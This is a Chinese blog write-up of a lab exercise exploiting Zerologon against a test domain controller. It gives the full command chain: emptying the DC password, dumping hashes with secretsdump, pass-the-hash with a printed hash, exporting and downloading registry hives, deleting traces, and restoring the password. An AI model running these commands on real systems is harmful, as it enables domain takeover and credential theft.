写在前面
最近练习的红日靶场正好有zerologon漏洞,炒个冷饭。关注的熟人大佬变多,发水文都有点不太好意思。
目录
0x01 漏洞原理0x02 影响版本0x03 利用方式0x04 工具获取
漏洞原理
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。虽然制空,但是域控机器账户是不能登录域控的,可以利用该账户拥有的DCSync权限导出哈希。最后传递DC的administrator的哈希获得域控权限。
简单来说:就是攻击者可以利用这个漏洞将域控密码设置为空。从而导出hash,掌握域控。
影响版本
Microsoft Windows Server 2008 R2 SP1Microsoft Windows Server 2012Microsoft Windows Server 2012 R2Microsoft Windows Server 2016Microsoft Windows Server 2019Microsoft Windows Server version 2004 (Server Core Installation)Microsoft Windows Server version 1903 (Server Core Installation)Microsoft Windows Server version 1909 (Server Core Installation)
利用方式
### 探测zerologon_tester.exe DC 192.168.93.30
### 置空set_empty_pw.exe DC 192.168.93.30
### dump hashessecretsdump.exe whoamianony.org/DC$@192.168.93.30 -no-pass
到这里漏洞利用步骤已经完成,已获取DC哈希。但DC$账号无hash会导致机器脱域,接下来利用获取到的administrator用户哈希PTH连接上DC,dump本地hash来获取DC$hash。进而还原DC$哈希。
-hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec administrator@192.168.93.30### 连接默认在C盘下,直接reg导出会进入交互界面卡死。解决方法:如reg save HKLM\SYSTEM system.save /y 表示强制覆盖已存在文件,避免目标机C:\目录下存在同名文件,命令会询问是否覆盖,半交互环境程序会卡住reg save HKLM\SYSTEM system.save /yreg save HKLM\SAM sam.save /yreg save HKLM\SECURITY security.save /y### 下载文件到本地,如果直接使用get无法识别改指令,使用lgetlget system.savelget sam.savelget security.save### 清理痕迹del /f *.save
## 获取DC$哈希secretsdump.exe -sam sam.save -system system.save -security security.save LOCAL
#复原DC$账户哈希reinstall_original_pw.exe DC 192.168.93.30 81609d698de5bc4bdec8729afaf0a807#验证DC$未处于置空状态secretsdump.exe whoamianony.org/DC$@192.168.93.30 -just-dc -no-pass
secretsdump.exe -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec administrator@192.168.93.30工具获取
Github搜索zerologon或者,公众号回复"zerologon"。
写在最后
本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
